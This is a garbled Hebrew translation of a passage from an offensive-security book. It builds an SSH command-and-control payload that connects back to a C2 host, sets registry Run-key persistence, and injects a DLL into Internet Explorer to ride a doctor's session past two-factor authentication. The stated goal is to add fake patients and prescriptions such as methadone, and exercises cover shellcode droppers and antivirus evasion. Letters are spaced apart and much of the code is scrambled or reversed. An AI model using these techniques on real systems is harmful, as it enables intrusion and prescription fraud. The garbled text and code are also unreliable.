‫מצ ב חריג א חר‪.‬‬
‫האמצעי המהיר‪ ,‬ה ק ל והממ חי ש ביותר ל בניית ת שתית מודו לרית ו ח סינת עתיד ש כזו הוא‬
‫ה שימו ש בפרו טו קו ל ‪SSH‬המאו ב ט ח והר ב‪-‬ת כ ליתי להפ ליא‪ .‬ת שתית כזו ת חו ל ק ל שני‬
‫ח ל קים ‪ -‬שרת ‪ C2‬והמ טען עצמו ‪ -‬כ ל א חד עם הדרי שות ה ט כניות ה באות‪.‬‬
‫שרת ‪C2‬‬
‫שרת ‪ SSH‬פוע ל ע ליציאת ‪TCP 443‬‬

‫‪ Chroot jail‬כדי לה כי ל את שרת ‪SSH‬‬
‫תצורת ‪ SSH‬שונה כדי לאפ שר מנהרות המוע ברות מר חו ק‬
‫מ טען‬
‫ה טמעת שרת ‪ SSH‬ביציאת ‪ TCP‬לא ס טנדר טית‬
‫ה טמעת ל קו ח ‪SSH‬המאפ שר חי בורים חזרה ל שרת ‪C2‬‬
‫ה טמעה ש ל מנהרות ‪)SSH‬הן מ קומיות והן דינמיות( ע ל ל קו ח ‪SSH‬המאפ שרות‬
‫גי שה ל‪ 2C-‬למער כת ק בצי היעד ו לתה לי כים‬
‫כדי ליי שם את הדרי שות ע בור המ טען‪ ,‬אני מאוד תומך ב שימו ש ב ספריית‬
‫)‪ libssh (https://www.libssh.org/‬ע בור שפת הת כנות ‪C.‬‬
‫זהיאפ שר לך ליצור קוד הדו ק מאוד ונותן גמי שות מעו לה‪ .‬ספריה זו גם תפ חית באופן‬
‫דרמ טי את זמן פיתו ח התו כנה ש לך‪ .‬מ כיוון ש‪libssh -‬נתמך במ ספר פ ל טפורמות‪ ,‬תו כ ל‬
‫ליצור עומ סים ע בור ‪Windows, OSX, Linux‬או ‪ Unix‬עם מינימום ש ל שינוי קוד‪ .‬כדי‬
‫לתת דוגמה עד כמה מהיר ו ק ל לה שתמ ש ‪ -libssh,‬בה קוד ה באיי שם שרת ‪SSH‬הפוע ל‬
‫ע ליציאת ‪TCP 900.‬ה קוד מ ספי ק כדי ליצור הפע לת ל קו ח ‪ SSH‬מאומתת ) באמצעות‬
‫שם מ שתמ ש ו סי סמה במ קום מפת ח צי בורי (‪:‬‬
‫>‪<stdio.h> #include <windows.h‬‬

‫‪#include <stdlib.h> #include‬‬
‫>‪#include <libssh/libssh.h‬‬
‫{ )(‪int main‬‬
‫‪ *ssh_session my_ssh_session; int rc; char‬סי סמה; } ;)‪exit(-1‬‬

‫;)‪< 0) { ssh_disconnect(my_ssh_session); ssh_free(my_ssh_session‬‬
‫)‪"c2user"); rc = ssh_connect(my_ssh_session); if (verify_knownhost(my_ssh_session‬‬
‫‪SSH_OPTIONS_PORT, 443); ssh_options_set(my_ssh_session, SSH_OPTIONS_USER,‬‬
‫‪SSH_OPTIONS_HOST, "c2host"); ssh_options_set(my_ssh_session,‬‬
‫‪= ssh_new(); if (my_ssh_session == NULL) exit(-1); ssh_options_set(my_ssh_session,‬‬
‫‪my_ssh_session‬‬
;(‫ סי סמה‬rc = ssh_userauth_password(my_ssh_session, NULL, ;("‫סי סמה =)" סי סמה‬

ssh_disconnect(my_ssh_session); ssh_free(my_ssh_session);
:‫ פ שו ט ביותר‬SSH ‫אמנם קוד זהיוצר מופע שרת‬

<windows.h> static int auth_password(char *user, char *password){
#include <string.h> #include <stdio.h> #include <unistd .h> #include
<libssh/libssh.h> #include <libssh/server.h> #include <stdlib.h>
#include "config.h" #include
0; ‫ה חזר‬if(strcmp(user,"c2payload"))
0; ‫"(( ה חזר‬daolyap2c",‫) סי סמה‬pmcrts)fi
1; } ‫חזרה‬
‫ה חזר‬ssh_bind_options_set(sshbind, SSH_BIND_OPTIONS_BINDPORT_STR, 900)
session=ssh_new(); ssh_disconnect(session); ssh_bind_free(sshbind); ssh_finalize();
0; ‫ה חזר‬0 } int main(){ sshbind=ssh_bind_new();
:‫ ניתן ליצור מנהרה הפו כה באופן ה בא‬,‫ל ב סוף‬

1080, NULL); channel = ssh_channel_accept_forward(session, 200, &port);
rc = ssh_channel_listen_forward(session, NULL,
.‫ כדי לנ טר את ת קינות ה קי שוריות‬libssh ‫י שנן שגרות טיפו ל חריגות המו בנות ב ספריית‬
.‫הפונ קציונ ליות הי חידה המתוארת כאן שעוד לא מ כו סה היא התמדה‬

‫ ב ואנ חנו‬-Microsoft Windows ‫י שנן דר כים ר בות ו שונות לגרום למ טען ש לך להתמ שך‬
‫ אני לא ממ ליץ ע ל‬.‫ לעת עתה נ לך במ ס לו ל ההמ ח שה הפ שו ט‬.‫נ ס קור זאת בפר ק ה בא‬
‫ כמו‬,‫גי שה זו בהת ק שרויות בעו לם האמיתי‬
‫זה פ חות אויותר אפ ס התגנ בות‪ .‬בוצע מ‪:C-‬‬

‫פ קודת ;]‪)ypcrtschar[100‬פ קודה‪" ,‬‬
‫‪reg.exe‬הו סף‬
‫"‪"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run‬‬
‫;) "‪)metsys/v "Innoce‬פ קודה(;‬
‫תמונה מציירת א לף מי לים‪ ,‬כפי שניתן לראות באיור ‪1.11.‬‬
‫איור ‪1.11:‬ת שתית ש לי טה ו ב קרה ב סי סית רא שונית‪.‬‬

‫ברגע שי ש לנויציאה קדימה מר חו ק‪,‬י ש לנו גי שה מ לאה למאר ח שנפרץ כמו תה ליך‬
‫המ שתמ ש שיזם את המא קרו ‪VBA.‬אנוי כו לים לה שתמ ש ‪ -SFTP‬ב ע ל פני פרו טו קו ל‬
‫‪ SSH‬לגי שה למער כת ק בצים‪ .‬ע ל מנת שהמ טעןיפעי ל מנהרות מרו ח קות‪,‬י ש להו סיף‬
‫את ה שורות ה באות ל קו בץ ‪ etc/ssh/sshd.config /‬במאר ח ‪C2:‬‬
‫התאם מ שתמ ש ‪c2user‬‬

‫‪ GatewayPorts‬כן‬
‫להגדרה הזוי ש ח סרונות מ שמעותיים; זה דור ש חי בור ק בוע בין המ טען ל‪ ,2C-‬שי כו ל‬
‫להתמודד ר ק עם חי בור א חד )מנהרה מרו ח קת( ו ל כן מאר ח א חד שנפרץ ב כ ל פעם‪ .‬אין‬
‫או טונומיה או אינ ט ליגנציה מו בנית במ טען כדי להתמודד אפי לו עם מצ בים מע ט חריגים‬
‫כמו הצורך לצאת דרך שרת פרו ק סי‪ .‬עם זאת‪ ,‬עד סוף ה ספר‪ ,‬ת שתית ‪ C2‬ש לנו תהיה‬
‫מתו ח כמת‪ ,‬אינ ט ליגנ טית‪ ,‬חמ קנית וגמי שה מאוד‪.‬‬
‫ההת קפה‬
‫בד קנו דר כים ל בנייה וא ספ קה ש ל מ טען שייתן לתו קף גי שה מר חו ק לת חנת הע בודה ש ל‬
‫מ טרה‪ ,‬אם כי באופן מוג ב ל ופרימי טי בי‪ .‬עם זאת‪ ,‬המ טרה הרא שונית ש לנו נ שארה זהה‪,‬‬
‫והיא לה שתמ ש בגי שה זו כדי להו סיף או ל שנות רי שומי מ טופ לים תוך התמ קדות במר שמים‬
‫לתרופות‪.‬‬
‫כדי להדגי ש‪ ,‬היעד ש לנו הוא הפע לת דפדפן )‪ Internet Explorer (IE‬ש ל מי קרו סופ ט‬
‫ומ שתמ ש בו כדי לג שת לאפ לי קציית האינ טרנ ט ‪Pharmattix.‬אין דפדפן א חר שנתמך ע ל‬
‫ידי ה ח ברה‪ .‬נו כ ל לפרו ס לוגר מפת ח ו ל ל כוד את אי שורי הגי שה ש ל הרופא‪ ,‬א ב ל זה לא פותר‬
‫את ה בעיה ש ל אימות דו‪-‬גורמי‪.‬‬
‫שם המ שתמ ש וה סי סמה הם ר ק ח ל ק מה בעיה‪ ,‬כי כר טי ס ח כם נדר ש גם כדי לג שת למאגר‬
‫הרפואי וי ש להציגו בעת ה כני סה‪ .‬נו כ ל להמתין מ חוץ למרפאה‪ ,‬ל שדוד את הרופא ו לגנו ב‬
‫את הארנ ק ש לו )ה כר טי סים ה ח כמים( הם בגוד ל ארנ ק נו ח(‪ ,‬א ב ל גי שה כזו לא תיע לם‬
‫מעיניהם‪ ,‬ו לצורך דוגמנות ‪APT,‬ה ל קו ח כנראה לאיא שר‪.‬‬
‫ע קיפת אימות‬
‫מה אם נו כ ל לע קוף את כ ל מנגנוני האימות ל ח לו טין? אנ חנוי כו לים! ט כני קה זו נ קראת‬
‫סי בו ב דפדפן ‪ -‬בעצם‪ ,‬אנו מ שתמ שים בגי שה ש לנו לת חנת הע בודה היעד כדי לר שת‬
‫הר שאות מהדפדפן ש ל הרופא ו לנצ ל באופן ש קוף את ההר שאות ש לו כדי לע שות בדיו ק‬
‫מה שאנ חנו רוצים‪.‬‬
‫כדי ל בצע את ההת קפה הזו‪ ,‬אנ חנו צרי כים להיות מ סוג לים לע שות ש לו שה ד ברים‪:‬‬
‫הזר קת קוד לתה ליך ‪-IE‬ההניג ש למ סד הנתונים הרפואי‪.‬‬

‫צור ספריית קי שורים דינמית ש ל פרו ק סי אינ טרנ ט )‪(DLL‬המ בו ס סת ע ל ‪API.‬‬
‫‪Microsoft WinInet‬‬
‫הע בר תע בורת אינ טרנ ט דרך מנהרת ה‪ HSS-‬ש לנו והפרו ק סי ה חד ש שנוצר‪.‬‬
‫בואו נ סת כ ל ע ל ש לו שת ה ש ל בים‪ .‬אף א חד מהם אינו מור כ ב כמו שהם ע שויים להיראות‬
‫בת חי לה‪.‬‬
‫ש ל ב ‪1:‬הזר קת ‪DLL‬‬
‫הזר קת ‪DLL‬היא תה ליך ש ל ה כנ סת קוד לתה ליך )תו כנית( קיים )פוע ל(‪ .‬הדרך ה ק לה ביותר‬
‫לע שות זאת היא לה שתמ ש בפונ קציה )(‪ LoadLibraryA‬ב‪ kernel32.dll. -‬קריאה זו די‬
‫תדאג ל כ ל זרימת הע בודה ב כך שהיא ת כני ס ות בצע ע בורנו את ‪-DLL‬ה ש לנו‪ .‬ה בעיה היא‬
‫שהפונ קציה הזו תר שום את ‪-DLL‬ה ש לנו בתה ליך היעד‪ ,‬שהוא אנ טי‪-‬וירו ס גדו ל לא‪ -‬לא‬
‫י ש דר כים א חרות ו טו בות‬Internet Explorer). ‫) במיו חד בתה ליך מפו ק ח הי ט ב כגון‬

:‫ בעי קרו ש ל ד בר זה מת ח ל ק לאר בעה ש ל בים‬.‫יותר ש בהן נו כ ל לע שות זאת‬
Internet Explorer). ‫צרף לתה ליך היעד ) במ קרה זה‬1.
.‫ה קצאת זי כרון בתוך תה ליך היעד‬2.
‫ה לזי כרון תה ליך היעד ו ח ש ב ערך מתאים‬-DLL ‫העת ק את‬3.
.‫כתו בות זי כרון‬
.‫ה ש לך‬-DLL ‫הנ חה את תה ליך היעד להפעי ל את‬4.
Windows. ‫ה ש ל‬-API ‫כ ל א חד מה ש ל בים ה ל לו מתועד הי ט ב בתוך‬
‫חי בור לתה ליך‬
hHandle = OpenProcess( PROCESS_CREATE_THREAD |
PROCESS_QUERY_INFORMATION |
‫ה קצאת זי כרון‬
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE |
PROCESS_VM_READ,
FALSE, procID );
‫ה קצאת זי כרון‬
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
= VirtualAllocEx( hProcess, NULL, dllFileLength,
dllFileLength = GetFileSize( hFile, NULL ); remoteDllAddr
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
NULL); hFile = CreateFileA( dllPath, GENERIC_READ, 0,
GetFullPathName(TEXT("proxy.dll"), BUFSIZE, dllPath,
‫ה כנ ס את ‪-DLL‬ה ו ק בע את כתו בת הזי כרון‬

‫‪lpBuffer = HeapAlloc( GetProcessHeap(),‬‬
‫;)‪0, dllFileLength‬‬
‫‪ReadFile( hFile, lpBuffer, dllFileLength, &dwBytesRead,‬‬
‫רי ק (;‬
‫‪WriteProcessMemory( hProcess,‬‬
‫‪lpBuffer, dllFileLength,‬‬
‫‪lpRemoteLibraryBuffer,‬‬
‫רי ק (; = ‪dwReflectiveLoaderOffset‬‬
‫;)‪GetReflectiveLoaderOffset(lpWriteBuff‬‬
‫בצע את קוד ‪-DLL‬ה ש ל ‪Proxy‬‬

‫‪rThread = CreateRemoteThread(hTargetProcHandle, NULL, 0,‬‬
‫;)‪lpStartExecAddr, lpExecParam, 0, NULL‬‬
‫;)‪WaitForSingleObject(rThread, INFINITE‬‬
‫אני מציע שת כיר את קריאות ‪-API‬הה ל לו‪ ,‬ש כן ה בנה כיצד להע ביר קוד בין תה לי כים‬
‫היא מיומנות לי בה במוד לים ש ל ‪APT‬וי שנן סי בות ר בות מדוע או לי נרצה לע שות זאת‪,‬‬
‫כו ל ל לע קוף את ר שימת ההיתרים ש ל תה לי כים‪ ,‬למ ש ל‪ ,‬או להע ביר הת קפה‬
‫לאר כי ט ק טורה א חרת או אפי לו להע לות את ההר שאות ש לנו בדרך כ ל שהי‪ .‬לדוגמה‪,‬‬
‫אם נרצה לגנו ב אי שורי כני סה ש ל ‪Windows,‬היינו מזרי קים את לוגר המפת חות ש לנו‬
‫לתה ליך ‪WinLogon.‬נ סת כ ל ע ל גי שות דומות במער כות מ בו ס סות ‪ UNIX‬מאו חריותר‪.‬‬
‫ב כ ל מ קרה‪,‬י שנן מ ספר הת קפות ע בודה קיימות ל ביצוע הזר קת תה ליך אם אינך רוצה‬
‫ליצור מ ש לך‪ .‬פונ קציונ ליות זו מ שו ל בת בצורה ח ל קה במ סגרת ‪ Metasploit,‬שאת‬
‫היתרונות וה ח סרונות ש לה נ ב חן בפר קים ה באים‪.‬‬
‫ש ל ב ‪2:‬יצירת ‪DLL Proxy‬המ בו ס ס ע ל ‪-API‬ה ש ל ‪WinInet‬‬

‫ע כ שיו כ שאנ חנויודעים מה ע לינו לע שות כדי ל ק ב ל קוד בתוך תה ליך ‪-IE,‬ה מה אנ חנו‬
‫הו ל כים ל שים שם ו למה?‬
‫‪ Internet Explorer‬מ שתמ ש ‪ -WinInet API‬ב באופן ב לעדי כדי ל טפ ל ב כ ל מ שימות‬
‫הת ק שורת ש לו‪ .‬זה לא מפתיע בהת ח ש ב ב כך ש שתיהן הן ט כנו לוגיות לי בה ש ל‬
‫מי קרו סופ ט‪ .‬כ ל תו כנית ע שויה לה שתמ ש ‪ -WinInet API‬ב והיא מ סוג לת ל בצע מ שימות‬
‫כגון ניהו ל קו בצי ‪ Cookie‬והפע לה‪ ,‬אימות ו כדומה‬
‫ביצוע מ שימות כגון ניהו ל קו בצי ‪ Cookie‬והפע לה‪ ,‬אימות ו כדומה‪ .‬בעי קרו ש ל ד בר‪,‬י ש‬
‫לו את כ ל הפונ קציונ ליות שאתה צריך כדי ליי שם דפדפן אינ טרנ ט או ט כנו לוגיה ק שורה‬
‫כגון פרו ק סי ‪ HTTP.‬מ כיוון ‪ -WinInet‬ש מנה לת באופן ש קוף את האימות ע ל ב סי ס כ ל‬
‫תה ליך‪ ,‬אם נו כ ל לה חדיר את שרת ‪-proxy‬ה ש לנו לתה ליך ‪-IE‬ה ש ל היעד ש לנו ו לנת ב‬
‫את תע בורת האינ טרנ ט ש לנו דר כו‪ ,‬אז נו כ ל לר שת את מצ בי ההפע לה ש ל היי שומים‬
‫ש להם‪ .‬זה כו ל ל את א לה שאומתו עם אימות דו‪-‬גורמי‪.‬‬
‫יי שום שרת פרו ק סי‬

‫פונ קציונ ליות‬
‫בניית שרת פרו ק סי היא מע בר למ סגרת הע בודה הזו; עם זאת‪,‬י שנם צדדים‬
‫ש לי שיים שמו כרים ספריות פרו ק סי מ ס חריות ע בור מפת חים‪ .‬הם מיו שמים אך ור ק‬
‫באמצעות ‪-API‬ה ש ל ‪ WinInet‬שניתן ל ש ל ב בהתאם לצר כים ש לך‪.‬‬
‫ש ל ב ‪ 3:‬שימו ש ב שרת ‪-Proxy‬ההמוזר ק‬

‫בהנ חה ש ש ל בי הה ליך התנה לו ע ל פי התו כנית‪ ,‬כעתי ש לנו שרת פרו ק סי ‪HTTP‬‬
‫הפוע ל ע ל מ ח ש ב היעד ש לנו )נגידיציאת )‪ TCP 1234‬ומוג ב ל לממ ש ק ‪-Ethernet‬ה‬
‫המ קומי‪ .‬בהת ח ש ב ב כך שת שתית הפי קוד וה ב קרה ש לנו אינה מת קדמת מ ספי ק כדי‬
‫לפתו ח מנהרות מרו ח קות תוך כדי תנועה‪ ,‬נצ טרך ל קודד מנהרה נו ספת לתוך המ טען‬
‫ש לנו‪ .‬נ כון לע כ שיו‪ ,‬המנהרה הי חידה חזרה לת חנת הע בודה היעד היא לגי שה ל שרת‬
‫‪SSH.‬אנ חנו צרי כים להו סיף מנהרה מרו ח קת שמצ ביעה ע ל ‪ 1234‬ע ל היעד ויוצרת‬
‫נ קודת קצה )נגידיציאת )‪ TCP 4321‬ב שרת ‪ C2‬ש לנו‪ .‬זהייראה מ שהו כמו איור ‪1.12.‬‬
‫איור ‪1.12:‬ההת קף שהו ש לם עם גי שה מ לאה לר שומות הרפואיות‪.‬‬

‫ב ש ל ב זה‪ ,‬אנוי כו לים להו סיף מ טופ לים חד שים ו לר שום להם מה שהם רוצים‪.‬‬
‫אין צורך בתעודת זהות בעת אי סוף תרופות מ בית המר ק חת‪ ,‬ש כן תעודה מזהה אמורה‬
‫להיות מוצגת בעתיצירת ח ש בון‪ .‬כמו בן‪ ,‬זו ר ק תי בת סימון ב כ ל הנוגע למ סד הנתונים‪.‬‬
‫כ ל מה שנ שא ל כ שנ לך ל ק חת את המתדון ש לנו הוא תאריך ה לידה ש לנו‪.‬‬
‫"אין ענן‪ ,‬זה ר ק מ ח ש ב ש ל מי שהו א חר‪".‬‬

‫‪ -‬לאידוע‬
‫סי כום‬
‫בפר ק זה‪ ,‬למדת כיצד לה שתמ ש ב‪ ABV-‬ו ב‪ SBV-‬כדי להוריד מ טען פ קודה ו ב קרה‪ .‬עם‬
‫מ טען זה במ קום‪ ,‬ראית כיצד ניתן ל חדור לתה ליך ‪ Internet Explorer‬ו לערער אימות‬
‫דו‪-‬גורמי ל לא צורך ב שמות מ שתמ ש‪ ,‬סי סמאות או א סימוני גי שה פיזיים‪.‬‬
‫ח שו ב לציין שהר בה אנ שים חו ש בים שהת קפות מא קרו הן סוג ש ל נגע ש ל שנות ה‪09-‬‬
‫שפ שו ט נע למו‪ .‬האמת היא שהם מעו לם לא ה ל כו‬
‫ש ל נגע ש ל שנות ה‪ 09-‬שפ שו ט נע לם‪ .‬האמת היא שהם מעו לם לא נע למו‪ ,‬א ב ל במ שך‬
‫זמן ר ב היו פ שו ט דר כים ק לותיותר להע ביר תו כנות זדוניות למ ח ש ב ש ליעד ) כמו ‪Flash‬‬
‫‪ Adobe‬למ ש ל(‪ .‬מ כיוון שהת קפות כא לה הופ כות פ חות ופ חות כדאיות‪ ,‬המא קרו ש ל‬
‫‪ Office‬ראה התעוררות מ חוד שת בפופו לריות‪.‬‬
‫מה הה ש ל כות מהפר ק הזה? רא שית‪ ,‬מא קרו ‪ -‬כמה פעמים ראית א חד שאתה באמת‬
‫צריך כדי לע שות את הע בודה ש לך? אם מי שהו נראה כאי לו הוא עו שה ה כ ל כדי לגרום‬
‫לך ל ל חוץ ע ל כפתור ההפע לה הזה‪ ,‬זה כנראה ח שוד‪.‬‬
‫זה כנראה ח שוד ב כ ל מ קרה‪ .‬כתו בת דואר א ל ק טרוני חוזרת אינה מעידה ע ל זהות‬
‫ה שו ל ח‪.‬‬
‫אימות דו‪-‬גורמי מע לה את הרף א ב ל הוא לא הו לך להגן מפני תו קף נ חו ש; ל לא ק שר‬
‫לאופי הגורם ה שני ) כ לומר‪ ,‬הודעת כר טי ס ח כם או ‪SMS),‬התוצאה זהה כאי לו נע שה‬
‫שימו ש באימות פ שו ט ש ל גורםי חיד‪ :‬נוצרת הפע לת ‪ HTTP‬ח סרת מצ ב שניתן לנ טר ל‬
‫באמצעות גני בת קו בצי ‪Cookie‬או אדם‪-‬אין ‪-‬הת קפת הדפדפן‪ .‬הגנה לעומ ק היא חיונית‪.‬‬
‫ה כ ל עד כה היה מתו כנן ופ שו ט ע ל מנת להפוך מו שגים להמ ח שה כ כ ל האפ שר‪.‬‬

‫בהת קדם‪ ,‬הד ברים הו ל כים להיות מור כ ביםיותר ויותר כ כ ל שאנו חו קרים הת קפות‬
‫ואפ שרויות חד שות‪ .‬מעתה וה לאה‪ ,‬נתר כז בהתגנ בות מ ק סימ לית ל לא פ שרות ‪ -‬סימן‬
‫ההי כר ש ל ‪ APT‬מצ לי ח‪.‬‬
‫בפר ק ה בא‪ ,‬ת שתית ה‪ 2C-‬תהיה מת קדמת ומציאותיתיותר‪ ,‬ונראה כיצדיי שומוני‬
‫‪Java‬י כו לים להיות אמצעי חמ קני ל ש ל ב מ טענים‪.‬‬
‫היה צורך ל כ סות הר בה קר קע בפר ק זה באמצעות ט כנו לוגיות שאו לי אינך מ כיר‪ .‬אני‬
‫מציע לע בוד ע ל התרגי לים ה באים כדי לה שיג בי ט חון עצמי עם המו שגים‪ ,‬אם כי פעו לה‬
‫זו אינה תנאי מו קדם להמ שך הפר ק ה בא‪.‬‬
‫‪1.‬יי שם את ת שתית ‪ C2‬כמתואר בפר ק זה באמצעות ‪ C‬ו‬

‫‪ libssh.‬ל ח לופין‪ ,‬ה שתמ ש ב כ ל שפת ת כנות ו ספריות שאתה מ כיר‪.‬‬
‫‪2.‬ה טמעו ש ל ‪ -VBS‬ב ‪ C2 dropper‬שמוריד מ טען מותאם אי שית כ‬

‫‪ shellcode‬ו לא בתור ‪ exe.‬ומ חדיר אותוי שירות לזי כרון‪ .‬ה שתמ ש ב קריאות ‪-API‬ה‬
‫מה ס קריפ ט הרא שוני ש ל ‪VBA.‬‬
‫‪ 3.‬בהנ חה שהמ טען ש לך היה צריך להיות פרו ס כ קוד מע טפת בתוך ‪VBA‬‬
‫ס קריפ ט‪ ,‬איך תערפ ל אותו‪ ,‬תזין אותו לזי כרון בית א חד ב כ ל פעם‪ ,‬ותפעי ל אותו?‬
‫ה שתמ ש ‪ -VirusTotal‬ב ו במ שא בים א חרים כדי לראות כיצד מנועי ‪ AV‬מגי בים‬
‫ל ט כני קות א לו‪.‬‬
‫פר ק ‪ 2‬גני בת מ ח קר פר ק זה ממ שיך להת ב ס ס ע ל מו שגי ה לי בה שנ ח קרו בפר ק ‪1 ,‬‬

‫"מ סירת מ טען ופי קוד ו ב קרה"‪ .‬ב כך היא מציגה ס בי בה שונה מאוד ותפי סתיעד שונה‬
‫מאוד‪.‬‬
‫אוני בר סי טאות נ ח ש בות מזמן למ טרות "ר כות" לתו קפים ו בצד ק‪.‬‬
‫למע ט מאוד מ כ ל לותי ש ת קצי ב לפת ח ו לת חז ק א ס טר טגיית א ב ט חה קוהרנ טית‪.‬יצירת‬
‫ס בי בה א קדמית שיתופית היא במו בן מ סוים א שמה ליי שום א ב ט חת מידע ב כ ל רמה‪.‬‬
‫למ כ ל לותי כו לות להיות ר שתות ר ח בותידיים המ כי לות הר בה מער כות הפע לה‬
‫ו ט כנו לוגיות שונות‪ .‬לרו ב אין סמ כות מר כזית אפ ק טי בית לא ב ט חה והת שתית ה כו ל לת‬
‫התפת חה לאורך שנים תוך ה סתמ כות ר בה ע ל מער כות מדור קודם‪ .‬האמת ה כוא בת‬
‫היא ש ב ש ל ב מ סוים אתה הופך להיות גדו ל מ כדי ל שרוד‪.‬‬
‫למה ל למוד כ שאפ שר לגנו ב תואר?‬
‫י שנן סי בות א חרות ל כך ש ס בי בות חינו כיות ברמה הג בוהה ביותר ע שויות להיות‬
‫ממו קדות‪ .‬לפני כמה שנים‪ ,‬הייתי חו קר מ שפ טי רא שי ש ביצע תרגי ל תגו בה לאירוע‬
‫בא חת המ כ ל לות היו קרתיות בעו לם‪ .‬המו סד ס בר ) בצד ק( שמער כת רי שומי‬
‫הת למידים ש להם נפרצה‪ .‬הפ שרה ה ביאה ל כך שת סרי טים ש ל בוגר א חד שונו כדי‬
‫ל ש קף את פר טי התו קף‪ ,‬שם‪ ,‬תאריך לידה ו כו'‪.‬‬
‫עם זאת‪ ,‬מ ספר הת למיד לא ה שתנה מ כיוון שזה היה שו בר אתיצירת האינד ק ס‬
‫ש ל מ סד הנתונים‪ .‬לא חר מ כן התו קףיצר ק שר עם המ כ ל לה ו בי ק ש העת ק ש ל‬
‫התואר " ש לו"‪ ,‬תואר רא שון ב ביו לוגיה‪ ,‬לפיו המ קור א בד ב שריפה‪ .‬הד ברים הא לה‬
‫קורים‪ ,‬הוא שי לם את דמי הה ח לפה ו קי ב ל העת ק ש ל התואר ע ל שמו‪ .‬צריך סוג‬
‫מיו חד ש ל עצ בים כדי להוציא מ שהו כזה והוא כמע טיצא מזה‪ .‬בג ל ל מז ל רע‬
‫ומ טומ טם‪ ,‬הוא ה שתמ ש בתואר " ש לו" כדי להגי ש ב ק שה ל קור ס לתואר שני‬
‫ב ביו לוגיהימית ) כנראה הת שו קה ש לו( במ כ ל לה א חרת‪ ,‬א ב ל לרוע מז לו‪ ,‬ה קור בן‬
‫ש לו פנה ל שם בעצמו שנה קודם ל כן‪.‬‬
‫הת ב ק שו תמ לי לים )המ כי לים בין היתר מ ספרי ת למידים( והד ברים לא ה סתדרו‪.‬‬
‫ת חי לה הוא שם ה קור בן עצמו‬
‫מ ספרים( והד ברים לא ה סת כמו‪ .‬בהת ח לה ה קור בן עצמו הוא שם בהונאה‪ ,‬א ב ל‬
‫כפי שמת ברר‪,‬י ש הר בהיותר תיעוד ש לך במ כ ל לה מא שר ר ק ההי שגים הא קדמיים‬
‫ש לך ‪-‬דיור ו כ ספים‪ ,‬למ ש ל‪.‬‬
‫כמו כן‪ ,‬הייתה העו בדה הפ שו טה שאף ס טודנ ט או מרצים א חרים לא שמעו ע ל‬
‫ה ב חור מעו לם‪ .‬באופן לא מפתיע‪ ,‬הה טעיה לא עמדה בניתו ח מדו קד ק‪ .‬מה שגם‬
‫לא מפתיע הוא שזה נ שאר מ חוץ ל חד שות‪.‬‬
‫לא המ שימה ה כי מוזרה שע בדתי ע ליה‪ ,‬א ב ל היא שם למע לה‪.‬‬
‫אוני בר סי טה גדו לה ויו קרתית ב ברי טניה קי ב לה רי שיון ממ שרד הפנים לערוך מ ח קר ע ל‬
‫ז לוף מו ח אנו שי מ טעם הצ בא ה ברי טי‪ .‬זהו ת חום מ ח קר שנוי במ ח לו קת‪ ,‬ש כן מ טרתו‬
‫היא ל שמור ע ל מו חות אנו שיים ב חיים ומתפ קדים מ חוץ לגוף‪ .‬אם אתה ח בר ב כו חות‬
‫המזוינים ותוהה מאיפה הם מ ביאים מו חות חיים‪ ,‬אני מציע לך ל קרוא את ה חוזה ש לך‬
‫בעיון ר ב‪ .‬המ ח קר עצמו לא היה מ סווג מ ב חינה ט כנית ‪ -‬רי שיון המ שרד ה ביתי היה עניין‬
‫ש ל תיעוד צי בורי ‪-‬א ב ל א ב ט חת מידע הייתה ת כונה ע ליונה ש ל הפרוי ק ט לא בג ל ל‬
‫המ ח לו קת א לא בג ל ל שמידע כזהיי ח ש ב שימו שי באותה מידה למדינת אוי ב‪ .‬הוזמנה‬
‫בדי קת חדירה והיא הגיעה ל שו ל חן ש לי‪ .‬מ סגרת הזמן לת קיפה הייתה ש בועיים וההי קף‬
‫היה פתו ח כ כ ל שניתן מ ב חינה חו קית‪ .‬די קן האוני בר סי טה עצמו ה שתתף בפגי שת‬
‫ההי קפים כמו גם צוות קציני צ בא‪.‬‬
‫טוו ח ה‪ PI-‬ה חיצוני ש ל האוני בר סי טה היה ‪ 16 /‬עם א לפי כתו בות תפו סות ומאותיי שומי‬
‫אינ טרנ ט‪ .‬למר בה המז ל‪ ,‬זה לא היה מו קד התרגי ל‪ .‬הגורמים המעוניינים רצו לדעת‪,‬‬
‫כ ל ה שאר‪ ,‬באיזו מהירות ניתן לג שת לר שת ה לי בה ע לידי תו קף ואיזה מינוף נו סף ניתן‬
‫לה שיג ב כ ל הנוגע לגי שה למער כות ב ח טי בת המ ח קר הרפואי‪ .‬כ ל מי שי ש לו גי שה‬
‫לנ כ סי האוני בר סי טה )מ ל בד ס טודנ טים(י כו ל להי ח ש ב באופן לגי טימי כמ טרה ‪-‬הד בר‬
‫נ חתם ע לידי הדי קן עצמו‪.‬‬
‫לאור מ סגרת הזמן ה קצרה‪ ,‬ה ח ל טתי ל ל כת ע ל מ בצע "ר ס ק ותפו ס" ר ח ב הי קף‪.‬‬
‫כ לומר‪ ,‬ל כוון להר בה מ שתמ שים ב בת א חת ו ל קוות שדי בוץייד ב ק ל קיר כ שתו קפים‬
‫אותם‪ .‬זיהוייעדים מתאימים פירו שויצירת ) ל כ ל הפ חות( ר שימה ש ל שמות‪ ,‬מ ח ל קות‬
‫ו כתו בות דוא" ל‪.‬‬
‫ה קרי טריונים ע בוריעד פו טנציא לייהיו‪:‬‬

‫ה קרי טריונים ע בוריעד פו טנציא לייהיו‪ :‬ח בר סג ל ע בור הר שאות ג בוהות מ שוערות למאגרי מידע פנימיים‬
‫מ סוימים‪.‬‬
‫א קדמאי בת חום שאינו ק שור למ ח שו ב ב שום צורה ‪-‬ה ב חירה ה סופית ה סת כמה באנתרופו לוגיה‪,‬‬
‫אר כיאו לוגיה ומדעי ה ח ברה‪.‬יעדים א לויאפ שרו לנו לנ סות גי שה מ חוץ ל ס בי בת המ ח קר הרפואי‪.‬‬
‫ח ברי צוות המ ח קר הרפואי בעצמם‪.‬‬
‫ה שתמ ש במ סגרות קיימות כדי לע שות את זה‬

‫הרמה כ בדה‬
‫אם אתה בונה ר שימתיעדים גדו לה‪ ,‬או לי תרצה ל ש קו ל כתי בת ס קריפ ט גירוד אינ טרנ ט כדי‬
